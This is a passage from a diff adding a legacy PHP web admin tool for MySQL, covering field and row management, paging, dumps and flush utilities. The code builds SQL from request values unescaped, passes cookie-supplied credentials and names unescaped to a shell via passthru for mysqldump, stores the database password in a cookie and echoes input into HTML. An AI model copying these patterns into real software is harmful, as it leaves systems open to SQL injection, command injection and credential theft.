+href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' 
+onClick=\"return confirm('Drop Field 
+\'$fieldname\'?')\">Drop</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Field</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Field</h1>\n";
+		$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+		$num = mysql_num_rows( $pResult );
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_array( $pResult );
+			if( $field["Field"] == $fieldname ) {
+				$fieldtype = $field["Type"];
+				$fieldkey = $field["Key"];
+				$fieldextra = $field["Extra"];
+				$fieldnull = $field["Null"];
+				$fielddefault = $field["Default"];
+				break;
+			}
+		}
+		$type = strtok( $fieldtype, " (,)\n" );
+		if( strpos( $fieldtype, "(" ) ) {
+			if( $type == "enum" | $type == "set" ) {
+				$valuelist = strtok( " ()\n" );
+			} else {
+				$M = strtok( " (,)\n" );
+				if( strpos( $fieldtype, "," ) )
+					$D = strtok( " (,)\n" );
+			}
+		}
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	echo "<form action=$PHP_SELF>\n";
+
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addField_submit>\n";
+	else if( $cmd == "edit" ) {
+		echo "<input type=hidden name=action value=editField_submit>\n";
+		echo "<input type=hidden name=old_name value=$fieldname>\n";
+	}
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+
+	echo "<h3>Name</h3>\n";
+	echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of 
+digits 
+following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == 
+"tinyint" ) 
+echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == 
+"smallint" 
+) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == 
+"mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) 
+echo 
+"checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" 
+) 
+echo "checked";?>>BIGINT (-9223372036854775808 ~ 
+9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) 
+echo 
+"checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" 
+) 
+echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == 
+"decimal" ) 
+echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) 
+echo 
+"checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == 
+"datetime" 
+) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 
+23:59:59, 
+YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == 
+"timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 
+2106..., 
+YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) 
+echo 
+"checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) 
+echo 
+"checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) 
+echo 
+"checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == 
+"varchar" ) 
+echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == 
+"tinytext" 
+) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) 
+echo 
+"checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == 
+"mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == 
+"longtext" 
+) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == 
+"tinyblob" 
+) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) 
+echo 
+"checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == 
+"mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == 
+"longblob" 
+) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) 
+echo 
+"checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) 
+echo 
+"checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value 
+list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo 
+"value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo 
+"value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? 
+if( 
+strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? 
+if( 
+strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( 
+strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( 
+$valuelist 
+!= "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto 
+increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? 
+if( 
+$fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( 
+$fielddefault != 
+"" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment 
+value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo 
+"checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY 
+KEY" 
+<? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Field'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Field'>\n";
+	echo "<input type=button value=Cancel onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, 
+$PHP_SELF, $queryStr, $errMsg,
+		$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, 
+$auto_increment, $primary_key, $valuelist;
+
+	if( $cmd == "add" )
+		$queryStr = "ALTER TABLE $tablename ADD $name ";
+	else if( $cmd == "edit" )
+		$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+
+	if( $M != "" )
+		if( $D != "" )
+			$queryStr .= "$type($M,$D) ";
+		else
+			$queryStr .= "$type($M) ";
+	else if( $valuelist != "" ) {
+		$valuelist = stripslashes( $valuelist );
+		$queryStr .= "$type($valuelist) ";
+	} else
+		$queryStr .= "$type ";
+
+	$queryStr .= "$unsigned $zerofill $binary ";
+
+	if( $default_value != "" )
+		$queryStr .= "DEFAULT '$default_value' ";
+
+	$queryStr .= "$not_null $auto_increment";
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	// key change
+	$keyChange = false;
+	$result = mysql_query( "SHOW KEYS FROM $tablename" );
+	$primary = "";
+	while( $row = mysql_fetch_array($result) )
+		if( $row["Key_name"] == "PRIMARY" ) {
+			if( $row[Column_name] == $name )
+				$keyChange = true;
+			else
+				$primary .= ", $row[Column_name]";
+		}
+	if( $primary_key == "PRIMARY KEY" ) {
+		$primary .= ", $name";
+		$keyChange = !$keyChange;
+	}
+	$primary = substr( $primary, 2 );
+	if( $keyChange == true ) {
+		$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+		$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+	}
+
+	viewSchema();
+}
+
+function dropField() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewSchema();
+}
+
+function viewData( $queryStr ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, 
+$rowperpage, $orderby;
+
+	echo "<h1>Data in Table</h1>\n";
+	if( $tablename != "" )
+		echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	else
+		echo "<p class=location>$dbname</p>\n";
+
+	$queryStr = stripslashes( $queryStr );
+	if( $queryStr == "" ) {
+		$queryStr = "SELECT * FROM $tablename";
+		if( $orderby != "" )
+			$queryStr .= " ORDER BY $orderby";
+		echo "<a 
+href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add 
+Data</a> | \n";
+		echo "<a 
+href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+	}
+
+	$pResult = mysql_db_query( $dbname, $queryStr );
+	$errMsg = mysql_error();
+
+	$GLOBALS[queryStr] = $queryStr;
+
+	if( $pResult == false ) {
+		echoQueryResult();
+		return;
+	}
+	if( $pResult == 1 ) {
+		$errMsg = "Success";
+		echoQueryResult();
+		return;
+	}
+
+	echo "<hr>\n";
+
+	$row = mysql_num_rows( $pResult );
+	$col = mysql_num_fields( $pResult );
+
+	if( $row == 0 ) {
+		echo "No Data Exist!";
+		return;
+	}
+
+	if( $rowperpage == "" ) $rowperpage = 20;
+	if( $page == "" ) $page = 0;
+	else $page--;
+	mysql_data_seek( $pResult, $page * $rowperpage );
+
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	for( $i = 0; $i < $col; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		echo "<th>";
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+		echo "</th>\n";
+	}
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $rowperpage; $i++ ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		echo "<tr>\n";
+		$key = "";
+		for( $j = 0; $j < $col; $j++ ) {
+			$data = $rowArray[$j];
+
+			$field = mysql_fetch_field( $pResult, $j );
+			if( $field->primary_key == 1 )
+				$key .= "&" . $field->name . "=" . $data;
+
+			if( strlen( $data ) > 20 )
+				$data = substr( $data, 0, 20 ) . "...";
+			$data = htmlspecialchars( $data );
+			echo "<td>\n";
+			echo "$data\n";
+			echo "</td>\n";
+		}
+
+		if( $key == "" )
+			echo "<td colspan=2>no Key</td>\n";
+		else {
+			echo "<td><a 
+href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+			echo "<td><a 
+href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' 
+onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+		}
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+
+	echo "<font size=2>\n";
+	echo "<form 
+action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' 
+method=post>\n";
+	echo "<font color=green>\n";
+	echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+	echo "</font>\n";
+	echo " | ";
+	if( $page > 0 ) {
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Prev</a>\n";
+	} else
+		echo "Prev";
+	echo " | ";
+	if( $page < ($row/$rowperpage)-1 ) {
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Next</a>\n";
+	} else
+		echo "Next";
+	echo " | ";
+	if( $row > $rowperpage ) {
+		echo "<input type=text size=4 name=page>\n";
+		echo "<input type=submit value='Go'>\n";
+	}
+	echo "</form>\n";
+	echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Data</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Data</h1>\n";
+		$pResult = mysql_list_fields( $dbname, $tablename );
+		$num = mysql_num_fields( $pResult );
+
+		$key = "";
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			if( $field->primary_key == 1 )
+				if( $field->numeric == 1 )
+					$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+				else
+					$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+		}
+		$key = substr( $key, 0, strlen($key)-4 );
+
+		mysql_select_db( $dbname, $mysqlHandle );
+		$pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE 
+$key", $mysqlHandle );
+		$data = mysql_fetch_array( $pResult );
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echo "<form action='$PHP_SELF' method=post>\n";
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addData_submit>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=hidden name=action value=editData_submit>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	echo "<th>Name</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Function</th>\n";
+	echo "<th>Data</th>\n";
+	echo "</tr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		$fieldname = $field["Field"];
+		$fieldtype = $field["Type"];
+		$len = mysql_field_len( $pResultLen, $i );
+
+		echo "<tr>";
+		echo "<td>$fieldname</td>";
+		echo "<td>".$field["Type"]."</td>";
+		echo "<td>\n";
+		echo "<select name=${fieldname}_function>\n";
+		echo "<option>\n";
+		echo "<option>ASCII\n";
+		echo "<option>CHAR\n";
+		echo "<option>SOUNDEX\n";
+		echo "<option>CURDATE\n";
+		echo "<option>CURTIME\n";
+		echo "<option>FROM_DAYS\n";
+		echo "<option>FROM_UNIXTIME\n";
+		echo "<option>NOW\n";
+		echo "<option>PASSWORD\n";
+		echo "<option>PERIOD_ADD\n";
+		echo "<option>PERIOD_DIFF\n";
+		echo "<option>TO_DAYS\n";
+		echo "<option>USER\n";
+		echo "<option>WEEKDAY\n";
+		echo "<option>RAND\n";
+		echo "</select>\n";
+		echo "</td>\n";
+		$value = htmlspecialchars($data[$i]);
+		if( $cmd == "add" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len 
+name=$fieldname></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len 
+name=$fieldname></textarea>\n";
+			}
+		} else if( $cmd == "edit" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					if( $value == $str )
+						echo "<option selected>$str\n";
+					else
+						echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname 
+value=\"$value\"></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len 
+name=$fieldname>$value</textarea>\n";
+			}
+		}
+		echo "</tr>";
+	}
+	echo "</table><p>\n";
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Data'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Data'>\n";
+	echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	if( $cmd == "add" )
+		$queryStr = "INSERT INTO $tablename VALUES (";
+	else if( $cmd == "edit" )
+		$queryStr = "REPLACE INTO $tablename VALUES (";
+	for( $i = 0; $i < $num-1; $i++ ) {
+		$field = mysql_fetch_field( $pResult );
+		$func = $GLOBALS[$field->name."_function"];
+		if( $func != "" )
+			$queryStr .= " $func(";
+		if( $field->numeric == 1 ) {
+			$queryStr .= $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "),";
+			else
+				$queryStr .= ",";
+		} else {
+			$queryStr .= "'" . $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "'),";
+			else
+				$queryStr .= "',";
+		}
+	}
+	$field = mysql_fetch_field( $pResult );
+	if( $field->numeric == 1 )
+		$queryStr .= $GLOBALS[$field->name] . ")";
+	else
+		$queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function deleteData() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	$key = "";
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		if( $field->primary_key == 1 )
+			if( $field->numeric == 1 )
+				$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+			else
+				$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+	}
+	$key = substr( $key, 0, strlen($key)-4 );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	$queryStr =  "DELETE FROM $tablename WHERE $key";
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function dump() {
+	global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+	if( $action == "dumpTable" )
+		$filename = $tablename;
+	else
+		$filename = $dbname;
+
+	header("Content-disposition: filename=$filename.sql");
+	header("Content-type: application/octetstream");
+	header("Pragma: no-cache");
+	header("Expires: 0");
+
+	$pResult = mysql_query( "show variables" );
+	while( 1 ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		if( $rowArray[0] == "basedir" )
+			$bindir = $rowArray[1]."bin/";
+	}
+
+	passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD 
+$dbname 
+$tablename" );
+}
+
+function utils() {
+	global $PHP_SELF, $command;
+	echo "<h1>Utilities</h1>\n";
+	if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+		echo "<hr>\n";
+		echo "Show\n";
+		echo "<ul>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+		echo "</ul>\n";
+		echo "Flush\n";
+		echo "<ul>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+		if( $command == "flush_hosts" ) {
+			if( mysql_query( "Flush hosts" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+		if( $command == "flush_logs" ) {
+			if( mysql_query( "Flush logs" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+		if( $command == "flush_privileges" ) {
+			if( mysql_query( "Flush privileges" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+		if( $command == "flush_tables" ) {
+			if( mysql_query( "Flush tables" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+		if( $command == "flush_status" ) {
+			if( mysql_query( "Flush status" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "</ul>\n";
+	} else {
+		$queryStr = ereg_replace( "_", " ", $command );
+		$pResult = mysql_query( $queryStr );
+		if( $pResult == false ) {
+			echo "Fail";
+			return;
+		}
+		$col = mysql_num_fields( $pResult );
+
+		echo "<p class=location>$queryStr</p>\n";
+		echo "<hr>\n";
+
+		echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+		echo "<tr>\n";
+		for( $i = 0; $i < $col; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			echo "<th>".$field->name."</th>\n";
+		}
+		echo "</tr>\n";
+
+		while( 1 ) {
+			$rowArray = mysql_fetch_row( $pResult );
+			if( $rowArray == false ) break;
+			echo "<tr>\n";
+			for( $j = 0; $j < $col; $j++ )
+				echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+			echo "</tr>\n";
+		}
+		echo "</table>\n";
+	}
+}
+
+function header_html() {
+	global $PHP_SELF;
+
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+	color: #11bb33;
+	font-size: small;
+}
+h1 {
+	color: #A4A260;
+}
+th {
+	background-color: #BDBE42;
+	color: #FFFFFF;
+	font-size: x-small;
+}
+td {
+	background-color: #DEDFA5;
+	font-size: x-small;
+}
+form {
+	margin-top: 0;
+	margin-bottom: 0;
+}
+a {
+	text-decoration:none;
+	color: #848200;
+	font-size:x-small;
+}
+a:link {
+}
+a:hover {
+	background-color:#EEEFD5;
+	color:#646200;
+	text-decoration:none
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+	echo "<hr>\n";
+	echo "<font size=2>\n";
+	echo "<font color=blue>[$USERNAME]</font> - \n";
+
+	echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+	if( $tablename != "" )
+		echo "<a 
+href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table 
+List</a> | ";
+	echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+	echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+	echo "</font>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+	logon();
+else if( $action == "logon_submit" )
+	logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	dump();
+} else {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	echo "<!--";
